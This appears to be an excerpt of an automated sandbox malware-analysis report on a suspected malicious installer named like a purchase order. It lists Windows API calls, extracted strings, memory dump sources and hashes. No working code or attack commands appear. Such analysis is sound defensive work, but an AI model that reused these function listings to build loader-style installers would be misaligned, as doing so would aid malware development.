                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                • String ID: N$gC@
                                                • API String ID: 3103080414-4003572143
                                                • Opcode ID: 353f568027e9435f0b10a007412a0fb7b671a4650aedb506db2b7bc5b58b0be6
                                                • Instruction ID: 67960cbe9d5dd80a83daf25f2437327cccbb0fafcef4e9f4d39b28ee92a42e65
                                                • Opcode Fuzzy Hash: 353f568027e9435f0b10a007412a0fb7b671a4650aedb506db2b7bc5b58b0be6
                                                • Instruction Fuzzy Hash: ED618FB1900209BFDB109F60DD85EAA7B79FB84345F00853AF605B62D0D77DA951CFA8
                                                APIs
                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                • DrawTextW.USER32(00000000,00433EE0,000000FF,00000010,00000820), ref: 00401156
                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                • DeleteObject.GDI32(?), ref: 00401165
                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964517391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.2964501899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964537105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964552878.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964579035.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                • String ID: F
                                                • API String ID: 941294808-1304234792
                                                • Opcode ID: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                • Instruction ID: 68187ad06c86d7515f13608b457f8be07a0117cb3bcf177897c910b083aea3f1
                                                • Opcode Fuzzy Hash: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                • Instruction Fuzzy Hash: 9A418C71800209AFCF058F95DE459AF7BB9FF44315F00842AF591AA1A0C778EA54DFA4
                                                APIs
                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004060A1,?,?), ref: 00405F41
                                                • GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405F4A
                                                  • Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
                                                  • Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57
                                                • GetShortPathNameW.KERNEL32(?,004310E8,00000400), ref: 00405F67
                                                • wsprintfA.USER32 ref: 00405F85
                                                • GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405FC0
                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FCF
                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406007
                                                • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040605D
                                                • GlobalFree.KERNEL32(00000000), ref: 0040606E
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406075
                                                  • Part of subcall function 00405DB0: GetFileAttributesW.KERNEL32(00442800,00402F1D,00442800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                                  • Part of subcall function 00405DB0: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964517391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.2964501899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964537105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964552878.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964579035.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                • String ID: %ls=%ls$[Rename]
                                                • API String ID: 2171350718-461813615
                                                • Opcode ID: f8d4e974cc956983b46bcde362b03df5d37b76f918305d7ec0ca4ec5166a0624
                                                • Instruction ID: 4536b0422d5dde00314373cba87b6dc9e05edcb010d47b65b9eea0f1bfd6f862
                                                • Opcode Fuzzy Hash: f8d4e974cc956983b46bcde362b03df5d37b76f918305d7ec0ca4ec5166a0624
                                                • Instruction Fuzzy Hash: 5A313531641B04BBC220AB659D48F6B3AACEF45744F15003FFA46F62D2DB7C98118ABD
                                                APIs
                                                • GetDlgItem.USER32(?,000003FB), ref: 00404771
                                                • SetWindowTextW.USER32(00000000,?), ref: 0040479B
                                                • SHBrowseForFolderW.SHELL32(?), ref: 0040484C
                                                • CoTaskMemFree.OLE32(00000000), ref: 00404857
                                                • lstrcmpiW.KERNEL32(00432E80,0042D248,00000000,?,?), ref: 00404889
                                                • lstrcatW.KERNEL32(?,00432E80), ref: 00404895
                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004048A7
                                                  • Part of subcall function 00405904: GetDlgItemTextW.USER32(?,?,00000400,004048DE), ref: 00405917
                                                  • Part of subcall function 0040654E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,00441800,00441800,0043F000,0040336A,00441800,74DF3420,004035D9,?,00000006,00000008,0000000A), ref: 004065B1
                                                  • Part of subcall function 0040654E: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004065C0
                                                  • Part of subcall function 0040654E: CharNextW.USER32(?,00000000,00441800,00441800,0043F000,0040336A,00441800,74DF3420,004035D9,?,00000006,00000008,0000000A), ref: 004065C5
                                                  • Part of subcall function 0040654E: CharPrevW.USER32(?,?,00441800,00441800,0043F000,0040336A,00441800,74DF3420,004035D9,?,00000006,00000008,0000000A), ref: 004065D8
                                                • GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,00000001,0042B218,?,?,000003FB,?), ref: 0040496A
                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404985
                                                  • Part of subcall function 00404ADE: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
                                                  • Part of subcall function 00404ADE: wsprintfW.USER32 ref: 00404B88
                                                  • Part of subcall function 00404ADE: SetDlgItemTextW.USER32(?,0042D248), ref: 00404B9B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964517391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.2964501899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964537105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964552878.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964579035.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: A
                                                • API String ID: 2624150263-3554254475
                                                • Opcode ID: 0e7a3ef283d1d7ec7faeb562c0eda326dd22e556ee24bddd125c463040a43afb
                                                • Instruction ID: 9ce2ccc5872d7715d19bac2dec5c0444f9ce2fea2c0a51142092d54e0f15b7c0
                                                • Opcode Fuzzy Hash: 0e7a3ef283d1d7ec7faeb562c0eda326dd22e556ee24bddd125c463040a43afb
                                                • Instruction Fuzzy Hash: F8A165B1A00208ABDB11AFA5CD45AAFB7B8EF84314F10847BF601B62D1D77C99418F6D
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00402EEE
                                                • GetModuleFileNameW.KERNEL32(00000000,00442800,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
                                                  • Part of subcall function 00405DB0: GetFileAttributesW.KERNEL32(00442800,00402F1D,00442800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                                  • Part of subcall function 00405DB0: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                                • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,00440800,00440800,00442800,00442800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                                Strings
                                                • Null, xrefs: 00402FD4
                                                • Inst, xrefs: 00402FC2
                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004030B5
                                                • Error launching installer, xrefs: 00402F2D
                                                • soft, xrefs: 00402FCB
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964517391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.2964501899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964537105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964552878.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964579035.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                • API String ID: 4283519449-527102705
                                                • Opcode ID: 9da78bb69fdb731252d5033ab884fa182416324aee7ddcf9fc3f40609bcd7e9e
                                                • Instruction ID: dd9ea635540f9dffb1b2b479f8e1e5c18960c1b6140bd96a969558b27d112ec4
                                                • Opcode Fuzzy Hash: 9da78bb69fdb731252d5033ab884fa182416324aee7ddcf9fc3f40609bcd7e9e
                                                • Instruction Fuzzy Hash: C151F471901205ABDB20AF60DD85B9F7FA8FB0431AF15403BF910B62D5C7789E408BAD
                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(00432E80,00000400), ref: 0040641D
                                                • GetWindowsDirectoryW.KERNEL32(00432E80,00000400,00000000,0042C228,?,00405359,0042C228,00000000), ref: 00406430
                                                • SHGetSpecialFolderLocation.SHELL32(00405359,?,00000000,0042C228,?,00405359,0042C228,00000000), ref: 0040646C
                                                • SHGetPathFromIDListW.SHELL32(?,00432E80), ref: 0040647A
                                                • CoTaskMemFree.OLE32(?), ref: 00406485
                                                • lstrcatW.KERNEL32(00432E80,\Microsoft\Internet Explorer\Quick Launch), ref: 004064AB
                                                • lstrlenW.KERNEL32(00432E80,00000000,0042C228,?,00405359,0042C228,00000000), ref: 00406503
                                                Strings
                                                • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004064A5
                                                • Software\Microsoft\Windows\CurrentVersion, xrefs: 004063ED
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964517391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.2964501899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964537105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964552878.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964579035.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                • API String ID: 717251189-730719616
                                                • Opcode ID: e07025652e73fd573f6e327d7dbd94b5af98cadfbb304e7c9a8d62640b3ffd73
                                                • Instruction ID: 29f0adb049bea166a756856afc1b7ff582c4fdfd81cc2e884c30b49282791dbd
                                                • Opcode Fuzzy Hash: e07025652e73fd573f6e327d7dbd94b5af98cadfbb304e7c9a8d62640b3ffd73
                                                • Instruction Fuzzy Hash: E6611071A00111ABDF209F54DC41AAE37A9EF45318F26803FE943BA2D0D77D9AA1C79D
                                                APIs
                                                • GetWindowLongW.USER32(?,000000EB), ref: 004042B5
                                                • GetSysColor.USER32(00000000), ref: 004042F3
                                                • SetTextColor.GDI32(?,00000000), ref: 004042FF
                                                • SetBkMode.GDI32(?,?), ref: 0040430B
                                                • GetSysColor.USER32(?), ref: 0040431E
                                                • SetBkColor.GDI32(?,?), ref: 0040432E
                                                • DeleteObject.GDI32(?), ref: 00404348
                                                • CreateBrushIndirect.GDI32(?), ref: 00404352
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964517391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.2964501899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964537105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964552878.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964579035.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                • String ID:
                                                • API String ID: 2320649405-0
                                                • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                • Instruction ID: a3c6a1d12b74a4a342abaca89036a15a37f51972f1e3113ed1cbee018e9c0b42
                                                • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                • Instruction Fuzzy Hash: 772156716007059BC724DF78D948B5B77F4AF81710B04893DED96A26E0D734E544CB54
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964517391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.2964501899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964537105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964552878.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964579035.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: CountTick$wsprintf
                                                • String ID: ... %d%%$@
                                                • API String ID: 551687249-3859443358
                                                • Opcode ID: 332a35644ce53e0492720e78fed1094326ce68f61c68911b2c6b8c231937ce50
                                                • Instruction ID: 5c504835c6c52170eea8577a9cac8da2a2598cbf1b76cdbdeb728d3f56fa2377
                                                • Opcode Fuzzy Hash: 332a35644ce53e0492720e78fed1094326ce68f61c68911b2c6b8c231937ce50
                                                • Instruction Fuzzy Hash: AA517A71900219DBCB10DFA5DA84A9E7BB8AF04366F14417BEC14B72C0CB78DA40CBA9
                                                APIs
                                                • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                  • Part of subcall function 00405E91: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405EA7
                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964517391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.2964501899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964537105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964552878.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964579035.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                • String ID: 9
                                                • API String ID: 163830602-2366072709
                                                • Opcode ID: 19438e2e62ba8aece1a895eee3c3762f252ce0cb36923fbe756b3879527f42a2
                                                • Instruction ID: 0a1b8613d15e357d59cabb4a84863d73d9dad353ca9b6e0785da3ca47288b3a0
                                                • Opcode Fuzzy Hash: 19438e2e62ba8aece1a895eee3c3762f252ce0cb36923fbe756b3879527f42a2
                                                • Instruction Fuzzy Hash: 42511974D00219AEDF219F95DA88AAEB779FF04304F10443BE901B72D0DBB89982CB18
                                                APIs
                                                • lstrlenW.KERNEL32(0042C228,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                • lstrlenW.KERNEL32(0040327A,0042C228,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                • lstrcatW.KERNEL32(0042C228,0040327A,0040327A,0042C228,00000000,?,74DF23A0), ref: 0040537D
                                                • SetWindowTextW.USER32(0042C228,0042C228), ref: 0040538F
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964517391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.2964501899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964537105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964552878.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964579035.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                • String ID:
                                                • API String ID: 2531174081-0
                                                • Opcode ID: 165d7cb729b0b1d8dbd40609dc1f72fd4c041b11e62b4558e2d47e9179cb1f78
                                                • Instruction ID: 851cb2e595d07e8670ef4c489cf40fd5108cb81fe88e509cf6dd9e4b353e565e
                                                • Opcode Fuzzy Hash: 165d7cb729b0b1d8dbd40609dc1f72fd4c041b11e62b4558e2d47e9179cb1f78
                                                • Instruction Fuzzy Hash: 20218371900518BACF11AFA5DD859CFBFB9EF45350F14807AF904B62A0C7B94A40DFA8
                                                APIs
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404C07
                                                • GetMessagePos.USER32 ref: 00404C0F
                                                • ScreenToClient.USER32(?,?), ref: 00404C29
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C3B
                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C61
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964517391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.2964501899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964537105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964552878.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964579035.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: Message$Send$ClientScreen
                                                • String ID: f
                                                • API String ID: 41195575-1993550816
                                                • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                • Instruction ID: 457ccdd811883e010b73e4973708530e0d9e00004b69c5e73a61d7a3cd07de8f
                                                • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                • Instruction Fuzzy Hash: CF015271900218BAEB10DBA4DD85BFEBBBCAF95711F10412BBA50B71D0D7B499018BA4
                                                APIs
                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                • MulDiv.KERNEL32(?,00000064,?), ref: 00402E3C
                                                • wsprintfW.USER32 ref: 00402E4C
                                                • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                                Strings
                                                • verifying installer: %d%%, xrefs: 00402E46
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964517391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.2964501899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964537105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964552878.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964579035.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: Text$ItemTimerWindowwsprintf
                                                • String ID: verifying installer: %d%%
                                                • API String ID: 1451636040-82062127
                                                • Opcode ID: e1d542de2cd716b5e5aca43617af61348071ba80885408b45aa8db9304e84829
                                                • Instruction ID: 97abdd23f95b89fa957f28f44bfdcbbe1494948371ff671501e6f707f2390605
                                                • Opcode Fuzzy Hash: e1d542de2cd716b5e5aca43617af61348071ba80885408b45aa8db9304e84829
                                                • Instruction Fuzzy Hash: B7014F7164020CBBEF209F60DE49FAA3B69AB04304F008439FA06B91E0DBB885558B98
                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040663B
                                                • wsprintfW.USER32 ref: 00406676
                                                • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040668A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964517391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.2964501899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964537105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964552878.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964579035.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                • String ID: %s%S.dll$UXTHEME$\
                                                • API String ID: 2200240437-1946221925
                                                • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                • Instruction ID: 9fa172bba6ca99a644905d2b6d7ed641771312ed853c50fe9922007c80c3d461
                                                • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                • Instruction Fuzzy Hash: 7CF0FC70501119A6CF10BB64DD0EF9B365CA700304F10447AA54AF10D1EBB9DB64CB99
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2986869713.0000000036260000.00000040.00000800.00020000.00000000.sdmp, Offset: 36260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36260000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                • API String ID: 0-3823777903
                                                • Opcode ID: f5a0c0fc681508fcc7feecb40d5ca36a57b87c63ea17f8ed8cd634be64337992
                                                • Instruction ID: c4992e3ce7aeb08da99fb792b0cfe1a07abfe5a00b919538ff4b88138e6ad691
                                                • Opcode Fuzzy Hash: f5a0c0fc681508fcc7feecb40d5ca36a57b87c63ea17f8ed8cd634be64337992
                                                • Instruction Fuzzy Hash: 18914F74B10209DFEB14DF66C55476E7BB2FF44348F228529E801AB295DFB49C85CB90
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2986869713.0000000036260000.00000040.00000800.00020000.00000000.sdmp, Offset: 36260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36260000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                                • API String ID: 0-390881366
                                                • Opcode ID: fb0a8bb3ce8d1245371b7ca0cb3e2e3096c2d4aa9478956040cd78c4dca04b73
                                                • Instruction ID: 275065cc87f002ff93a55359797fdb50e7cf87cba7cbf10cc945d34ab25286e3
                                                • Opcode Fuzzy Hash: fb0a8bb3ce8d1245371b7ca0cb3e2e3096c2d4aa9478956040cd78c4dca04b73
                                                • Instruction Fuzzy Hash: ECF15E34A00605CFE705DBAAD598A6EBBB3FF84344F218528D815AB365DF71DC86CB81
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                • GlobalFree.KERNEL32(?), ref: 00402956
                                                • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2964517391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.2964501899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964537105.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964552878.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.2964579035.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                • String ID:
                                                • API String ID: 2667972263-0
                                                • Opcode ID: b3fdf1977b6322b79f2de70fe62da7d4d8df1abbe89a1d301570377ab221975a
                                                • Instruction ID: 46c72067781f24dbae578634f425dbba750e376c3d5c902d6f733973cd64d3bf
                                                • Opcode Fuzzy Hash: b3fdf1977b6322b79f2de70fe62da7d4d8df1abbe89a1d301570377ab221975a
                                                • Instruction Fuzzy Hash: 9621AEB1800128BBDF116FA5DE89DDE7E79AF08364F14423AF960762E0CB794C418B98
                                                APIs
